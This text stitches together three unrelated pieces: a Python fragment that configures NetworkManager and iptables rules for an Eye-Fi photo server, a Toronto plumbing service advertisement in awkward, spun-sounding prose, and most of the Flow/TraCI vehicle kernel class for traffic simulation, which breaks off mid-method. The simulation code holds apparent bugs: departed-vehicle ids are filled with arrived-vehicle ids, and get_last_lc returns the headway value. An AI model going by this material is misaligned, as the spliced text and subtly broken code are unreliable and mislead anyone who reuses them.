def nm_check_disconnected(interface):
"""Returns True if interface is disconnected"""
# $ nmcli -t -f DEVICE,STATE dev
# wlan0:disconnected
# eth0:connected
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE,STATE", "dev"])
for line in [l.strip() for l in output.strip().splitlines() if l.strip()]:
dev, state = line.split(':')
if dev == interface:
if state == 'disconnected':
logger.info("GOOD! Device %s is disconnected.", interface)
return True
else:
logger.warn("Device %s isn't disconnected - Device state: %s", interface, state)
return False
logger.warn("nmcli doesn't returned info for interface %s", interface)
return False
def nm_try_disconnect(interface):
return subprocess.call(["nmcli", "dev", "disconnect", "iface", interface])
def ifconfig(interface, ip):
return kdesudo(["ifconfig", interface, "{0}/24".format(ip)])
def iptables(interface, ip):
# FIXME: put comments and check it to not repeat the setup of firewall every time the app starts
iptables_rules = subprocess.check_output(["kdesudo", "--", "iptables", "-n", "-v", "-L", "INPUT"])
logger.debug("iptables_rules: %s", iptables_rules)
if iptables_rules.find("/* EyeFiServerUi/1 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "icmp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/1", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/2 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "tcp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/2",
"--dport", "59278", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/3 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "udp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/3",
"--dport", "67:68", "-j", "ACCEPT"])
|
‘Last updated: February 11, 2019‘ When you need 24-hour Swansea plumbers we are an experienced group of local plumbing pros who care to help you. There are houses in the Swansea part of Toronto that date back to the 1800’s. With a neighborhood that old, there are bound to be some maintenance issues. Our Swansea plumbers service this part of Toronto and other local neighborhoods. You know you are in safe hands when you call a company who has been in the industry for over 25 years.
You can be confident that after you call to hire our local Swansea plumber we will arrive within 24-hours. We will assess the problem, provide the best possible, cost-effective long-term plumbing solution while we will show you the cost up front before getting started with the work so you can be as comfortable as possible with the service. It’s that simple. We do not have any hidden charges and do not charge for overtime. We even work all year long, with no days off. So you can always count on us anytime you have any setbacks because of your plumbing. Please feel free to reach out to us 24-hours.
When you call our Swansea plumbers you can expect nothing but world-class local professionals on call to arrive and fix your plumbing problem quickly and efficiently. When we arrive at your doorstep it is fully prepared to handle any issue, big or small, with all of the tools and materials we need to get any problem fixed up in no time at all.
Our plumbing options are always long-demand with the use of advanced plumbing technology, we could use minimally and non-invasive procedures which will make sure your house is warm, secure, and dry in the future. We’re enthusiastic about what we do and enjoy presenting a clean and organized appearance in company uniforms. You will only ever get a flat-rate offer from our Swansea plumbers and we will provide you this pricing prior to beginning the job. There are never any hourly charges or overtime fees and no additional fees if you need us on a weekend, even though it’s the evening or night, or perhaps on a significant holiday.
Moreover, our Swansea plumbing services can be found from local plumbers that are known for our considerate demeanor and communication that is useful. It’s because we need a fantastic deal of time when selecting the best and most experienced plumbers who are wonderful people and who have an established willingness to really care to make sure you’re familiar with the flat-rate cost upfront as well as the outcome upon the end of this project. In our effort to benefit everyone involved it’s our duty to clean up the region and ask your written inspection at the close of the task. It is our pleasure and privilege to provide our Swansea plumbing services to you 24-hours a day. Give us a phone and get your plumbing needs relieving fast and at a reasonable, flat-rate, upfront price today!
|
"""Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = []
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = []
# whether or not to automatically color vehicles
try:
self._color_vehicles = sim_params.color_vehicles
except AttributeError:
self._color_vehicles = False
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
vehicle_obs = {}
for veh_id in self.__ids:
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id not in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
else:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
if veh_id in self.get_ids():
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. GreenWaveEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids.clear()
self._arrived_ids.clear()
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.scenario.network,
"template_vehicles"):
for veh_id in self.master_kernel.scenario.network.\
template_vehicles:
vals = deepcopy(self.master_kernel.scenario.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
# updated the list of departed and arrived vehicles
self._num_departed.append(
len(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]))
self._num_arrived.append(len(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]))
self._departed_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
self._arrived_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
try:
self.__vehicles[headway[0]]["follower"] = veh_id
except KeyError:
print(traceback.format_exc())
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
self.__rl_ids.append(veh_id)
self.num_rl_vehicles += 1
else:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION, tc.VAR_ROAD_ID,
tc.VAR_SPEED, tc.VAR_EDGES, tc.VAR_POSITION, tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
try:
# remove from the vehicles kernel
del self.__vehicles[veh_id]
del self.__sumo_obs[veh_id]
self.__ids.remove(veh_id)
# remove it from all other ids (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
else:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
except KeyError:
pass
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
def get_arrived_ids(self):
"""See parent class."""
if len(self._arrived_ids) > 0:
return self._arrived_ids[-1]
else:
return 0
def get_departed_ids(self):
"""See parent class."""
if len(self._departed_ids) > 0:
return self._departed_ids[-1]
else:
return 0
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_last_lc(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
if veh_id not in self.__rl_ids:
warnings.warn('Vehicle {} is not RL vehicle, "last_lc" term set to'
' {}.'.format(veh_id, error))
return error
else:
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=list()):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=list()):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.scenario.get_edge_list()
junction_list = self.master_kernel.scenario.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.scenario.get_edge_list()) + len(
self.master_kernel.scenario.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.scenario.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
Parameters
----------
veh_id : str
name of the vehicle
edge_dict : dict < list<tuple> >
Key = Edge name
Index = lane index
Element = list sorted by position of (vehicle id, position)
Returns
-------
headway : list<float>
Index = lane index
Element = headway at this lane
tailway : list<float>
Index = lane index
Element = tailway at this lane
lead_speed : list<str>
Index = lane index
Element = speed of leader at this lane
follow_speed : list<str>
Index = lane index
Element = speed of follower at this lane
leader : list<str>
Index = lane index
Element = leader at this lane
follower : list<str>
Index = lane index
Element = follower at this lane
"""
this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.scenario.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
# if you are at the end or the front of the edge, the lane
# leader is in the edges in front of you
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
# you are in the back of the queue, the lane follower is in the
# edges behind you
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.scenario.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.scenario.edge_length(edge)
edge, lane = self.master_kernel.scenario.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.scenario.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.scenario.prev_edge(edge, lane)[0]
add_length += self.master_kernel.scenario.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
# compute the target lane, and clip it so vehicle don't try to lane
# change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.scenario.num_lanes(this_edge) - 1)
# perform the requested lane action action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), 100000)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if self.get_edge(veh_id) == '':
# occurs when a vehicle crashes is teleported for some other reason
return 0.
return self.master_kernel.scenario.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# color rl vehicles red
